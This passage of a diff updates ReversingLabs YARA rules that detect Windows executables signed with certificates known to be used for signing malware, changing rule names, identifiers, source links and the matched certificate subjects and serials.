+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MUSTER PLUS SP Z O O" and pe.signatures [ i ] . serial == "04:4e:05:bb:1a:01:a1:cb:b5:0c:fb:6c:d2:4e:5d:6b" and 1601427600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_73E2F34C9C2435F29Bbe0A3C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B7F19B13De9Bee8A52Ff365Ced6F67Fa : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "284c206f-8a0c-5bb6-8f28-d8e5e60efe3e"
+		id = "0e7e235e-3f0b-5396-9c19-9336d9cbb95a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13404-L13420"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "503429e737e8bdad735cf88e2bb2877d1f52b2c38be101a7a129c02db608a347"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6328-L6346"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a8d2a92b44cdd7b123907a6a77ba0fc9fde4961f9ac846b36f1e87730a1efae6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17311,21 +41976,21 @@ rule REVERSINGLABS_Cert_Blocklist_73E2F34C9C2435F29Bbe0A3C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "73:e2:f3:4c:9c:24:35:f2:9b:be:0a:3c" and 1480312984 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALEXIS SECURITY GROUP, LLC" and ( pe.signatures [ i ] . serial == "00:b7:f1:9b:13:de:9b:ee:8a:52:ff:36:5c:ed:6f:67:fa" or pe.signatures [ i ] . serial == "b7:f1:9b:13:de:9b:ee:8a:52:ff:36:5c:ed:6f:67:fa" ) and 1574914319 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_68C457D7495D2A8D0D7B9042836135C2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B61B8E71514059Adc604Da05C283E514 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a8ed2e72-d94e-5141-8ceb-181459a729ad"
+		id = "2587d30d-e9c8-599c-9cc4-4d4a7aa83c34"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13422-L13438"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3eb63f75f258eec611fa4288302f0ce5e47149ca876265a4a4b65dc33313aaa6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6348-L6366"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1255cef74082c9cad41ac8e7d62e740f69e6ba44171bb45655a68ee5db204e57"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17335,21 +42000,21 @@ rule REVERSINGLABS_Cert_Blocklist_68C457D7495D2A8D0D7B9042836135C2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "68:c4:57:d7:49:5d:2a:8d:0d:7b:90:42:83:61:35:c2" and 1476921600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APP DIVISION ApS" and ( pe.signatures [ i ] . serial == "00:b6:1b:8e:71:51:40:59:ad:c6:04:da:05:c2:83:e5:14" or pe.signatures [ i ] . serial == "b6:1b:8e:71:51:40:59:ad:c6:04:da:05:c2:83:e5:14" ) and 1603328400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6B72Ca367D40Fbef16E73E6Eba6A9A59 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ece6Cbf67Dc41635A5E5D075F286Af23 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e1cf9568-9a6a-58cb-81a4-25063ccc1ac7"
+		id = "3e451a5a-835b-572d-ab17-ff52d3614a86"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13440-L13456"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2b20c16dafcd891c36b28b36093cd3ad3a15f3795f0f2adda61fb0db2835d02d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6368-L6386"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f560e6f4a65eaac8db1d8accb0748de17048e66ccf989468e6350a3ec1d70dc8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17359,21 +42024,21 @@ rule REVERSINGLABS_Cert_Blocklist_6B72Ca367D40Fbef16E73E6Eba6A9A59 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "6b:72:ca:36:7d:40:fb:ef:16:e7:3e:6e:ba:6a:9a:59" and 1476748800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THRANE AGENTUR ApS" and ( pe.signatures [ i ] . serial == "00:ec:e6:cb:f6:7d:c4:16:35:a5:e5:d0:75:f2:86:af:23" or pe.signatures [ i ] . serial == "ec:e6:cb:f6:7d:c4:16:35:a5:e5:d0:75:f2:86:af:23" ) and 1603369254 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_736B7663D322533413F36E3E7E55F920 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_014A98D697B44F43Ded21F18Eb6Ad0Ba : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1991779a-8b5d-5188-8a36-c8451923e88f"
+		id = "4fcd4e89-658c-593b-8f94-edd5df19da6e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13458-L13474"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "44e86319106a4bf8edba6c1be2f90d68b3d1ef4591f0cc23921a0dc4da4a407b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6388-L6404"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9f1cc61b944974696113912bc1d1a0b45b9911fa4d6de382a48c0d22d2d20953"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17383,21 +42048,21 @@ rule REVERSINGLABS_Cert_Blocklist_736B7663D322533413F36E3E7E55F920 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Net Technology" and pe.signatures [ i ] . serial == "73:6b:76:63:d3:22:53:34:13:f3:6e:3e:7e:55:f9:20" and 1159488000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hillcoe Software Inc." and pe.signatures [ i ] . serial == "01:4a:98:d6:97:b4:4f:43:de:d2:1f:18:eb:6a:d0:ba" and 1605364760 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_54A170102461Fdc967Acfafe4Bbbc7F0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_063A7D09107Eddd8Aa1F733634C6591B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d012df1d-5e85-57b4-8a79-5da91369a14a"
+		id = "0169cf47-72b0-53ec-bc8f-c2a80febad3a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13476-L13492"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ddae18d566fa2fd077f51d0afff74fb8a8e525f88f23908c7402a4b2c092ad24"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6406-L6422"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "19f11e1d9ce95eb4bc75387a0118c230388a13cd07b02e00ea1d65cdcc0b2bd7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17407,21 +42072,21 @@ rule REVERSINGLABS_Cert_Blocklist_54A170102461Fdc967Acfafe4Bbbc7F0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "54:a1:70:10:24:61:fd:c9:67:ac:fa:fe:4b:bb:c7:f0" and 1476748800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Smart Line Logistics" and pe.signatures [ i ] . serial == "06:3a:7d:09:10:7e:dd:d8:aa:1f:73:36:34:c6:59:1b" and 1605712706 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0C501B8B113209C96C8119Cf7A6B8B79 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1E74Cfe7De8C5F57840A61034414Ca9F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9ec73230-10cd-55ad-9ef7-56a875294cab"
+		id = "d7fd0c3f-0292-5d27-b8e6-559b829440b4"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13494-L13510"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "dca37fda83650979566fb6ffbedaf713955a3c7f03ecc62e2e155475b7ca00e4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6424-L6442"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d82220d908283f1707ec15882503b02cb8dc80095279a9e7d6cbdd113c25d8ae"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17431,21 +42096,21 @@ rule REVERSINGLABS_Cert_Blocklist_0C501B8B113209C96C8119Cf7A6B8B79 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "0c:50:1b:8b:11:32:09:c9:6c:81:19:cf:7a:6b:8b:79" and 1474329600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Insta Software Solution Inc." and ( pe.signatures [ i ] . serial == "00:1e:74:cf:e7:de:8c:5f:57:84:0a:61:03:44:14:ca:9f" or pe.signatures [ i ] . serial == "1e:74:cf:e7:de:8c:5f:57:84:0a:61:03:44:14:ca:9f" ) and 1601733106 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0300Ee4A4C52443147821A8186D04309 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_75Cf729F8A740Bbdef183A1C4D86A02F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "abccf84f-ba18-5644-897c-d23a228facff"
+		id = "e96fdf57-3884-526e-a704-93e783c95241"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13512-L13528"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8476ece98427c1ffd99d820c25fe664397de2c393473f7d5ee0846d8d840fd9e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6444-L6460"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "691fadaa653ecd29e60f2db39b7c5154d7c85f388f72eccd0a4b5fe42eaee0dd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17455,21 +42120,21 @@ rule REVERSINGLABS_Cert_Blocklist_0300Ee4A4C52443147821A8186D04309 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Buster Ind Com Imp e Exp de Acessorios P Autos Ltda" and pe.signatures [ i ] . serial == "03:00:ee:4a:4c:52:44:31:47:82:1a:81:86:d0:43:09" and 1494892800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Umbor LLC" and pe.signatures [ i ] . serial == "75:cf:72:9f:8a:74:0b:bd:ef:18:3a:1c:4d:86:a0:2f" and 1604223894 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_202Cf8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2F64677254D3844Efdac2922123D05D1 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1c442ed6-a48a-52f4-b345-300428ec9c76"
+		id = "de9ef02d-a723-5013-9f91-e394edc23855"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13530-L13546"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "671a4b522761fdff75d1c0c608e8cfb21c7ab538c8c30c8620315bc58ed358e6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6462-L6478"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f9f1f629e03563ece0fe5186b199e2f030dce7f58fb259de1aeb7387c76fa902"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17479,21 +42144,21 @@ rule REVERSINGLABS_Cert_Blocklist_202Cf8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DATALINE LTD." and pe.signatures [ i ] . serial == "20:2c:f8" and 1087841761 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORGANICUP ApS" and pe.signatures [ i ] . serial == "2f:64:67:72:54:d3:84:4e:fd:ac:29:22:12:3d:05:d1" and 1605640092 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6651Cc8B4850D4Dec61961503Ea7956B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_32Fbf8Cfa43Dca3F85Efabe96Dfefa49 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "88679114-9c85-5810-af21-d5c2a8dc759e"
+		id = "22bd8590-7a95-564c-ad77-fb20569de51d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13548-L13564"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "29bfe9c8b340b55a9daa2644e8d55b2b783cc95c85541732e6e0decca8c10ff6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6480-L6496"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "73d80e6a0dc2316524a55a9627792b9b4488d238ef529f1767de182956b0865e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17503,21 +42168,21 @@ rule REVERSINGLABS_Cert_Blocklist_6651Cc8B4850D4Dec61961503Ea7956B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NUSAAPPINSTALL(APPS INSTALLER S.L.)" and pe.signatures [ i ] . serial == "66:51:cc:8b:48:50:d4:de:c6:19:61:50:3e:a7:95:6b" and 1436175828 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foxstyle LLC" and pe.signatures [ i ] . serial == "32:fb:f8:cf:a4:3d:ca:3f:85:ef:ab:e9:6d:fe:fa:49" and 1598255906 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_25Bef28467E4750331D2F403458113B8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ef9D0Cf071D463Cd63D13083046A7B8D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a97723cb-7814-5f08-af94-6244c1cf4145"
+		id = "8751f71b-0ebb-5820-927c-684a5ae5ee7b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13566-L13582"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "dc59fdecf60f3781e92cfe8469be2e0c1cb1cfdd3e9f9757d159667437cb37f5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6498-L6516"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2923979811504f78a79a2480600285a2697845e51870a44ed231a81e79807121"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17527,21 +42192,21 @@ rule REVERSINGLABS_Cert_Blocklist_25Bef28467E4750331D2F403458113B8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "25:be:f2:84:67:e4:75:03:31:d2:f4:03:45:81:13:b8" and 1474156800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rubin LLC" and ( pe.signatures [ i ] . serial == "00:ef:9d:0c:f0:71:d4:63:cd:63:d1:30:83:04:6a:7b:8d" or pe.signatures [ i ] . serial == "ef:9d:0c:f0:71:d4:63:cd:63:d1:30:83:04:6a:7b:8d" ) and 1605358307 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0296Cf3314F434C5B74D0C3E36616Dd1 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_115Cf1353A0E33E19099A4867A4C750A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ae7d8c3c-0ac8-5ea5-8013-97ccb2ace4e4"
+		id = "c2564461-6731-5d7b-8dbb-560929b568d0"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13584-L13600"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "acf3b7460c79fa71c1b131b26a40bbc286c9da0a5fe7071bbe8b386a3ca91de4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6518-L6536"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2a3353c655531b113dc019a86288310881e3bbcb6c03670a805f22b185e09e6c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17551,21 +42216,21 @@ rule REVERSINGLABS_Cert_Blocklist_0296Cf3314F434C5B74D0C3E36616Dd1 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "02:96:cf:33:14:f4:34:c5:b7:4d:0c:3e:36:61:6d:d1" and 1474934400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "212 NY Gifts, Inc." and ( pe.signatures [ i ] . serial == "00:11:5c:f1:35:3a:0e:33:e1:90:99:a4:86:7a:4c:75:0a" or pe.signatures [ i ] . serial == "11:5c:f1:35:3a:0e:33:e1:90:99:a4:86:7a:4c:75:0a" ) and 1605515909 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_045D57D63E13775C8F812E1864797F5A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5Cf3778Bb11115A884E192A7Cb807599 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c2c37ddc-51bc-58da-b770-df97aebca01d"
+		id = "cd643ad5-254a-5c53-a6f2-b263ff539cd3"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13602-L13618"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d3e61e9a43f5b17ebb08b71dc39648d1f20273a18214f39605f365f9f0f72c10"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6538-L6556"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4242ef4a30bb09463ec5a6df9367915788a2aa782df6c463bcf966d2aad63c1d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17575,21 +42240,21 @@ rule REVERSINGLABS_Cert_Blocklist_045D57D63E13775C8F812E1864797F5A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Mei" and pe.signatures [ i ] . serial == "04:5d:57:d6:3e:13:77:5c:8f:81:2e:18:64:79:7f:5a" and 1485043200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLOMATIC d.o.o." and ( pe.signatures [ i ] . serial == "00:5c:f3:77:8b:b1:11:15:a8:84:e1:92:a7:cb:80:75:99" or pe.signatures [ i ] . serial == "5c:f3:77:8b:b1:11:15:a8:84:e1:92:a7:cb:80:75:99" ) and 1605006199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6D633Df9Bb6015Fc3Ecea99Dff309Ee7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_82Cb93593B658100Cdd7A00C874287F2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b85bf9c5-f438-5973-83ab-926e44cf2298"
+		id = "85df653a-a4a3-5d0e-86f4-cad0249cd3d3"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13620-L13636"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "84e2f427ee79b47db8d0e5f1e2217a7e1c1ea64047e01b4ea6db69f529501f36"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6558-L6576"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c77881e0365c9fc398097d0b6e077330a5f0fcbb53279bfde96b3c01df914c55"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17599,21 +42264,21 @@ rule REVERSINGLABS_Cert_Blocklist_6D633Df9Bb6015Fc3Ecea99Dff309Ee7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "6d:63:3d:f9:bb:60:15:fc:3e:ce:a9:9d:ff:30:9e:e7" and 1474156800 <= pe.signatures [ i ] . not_after )
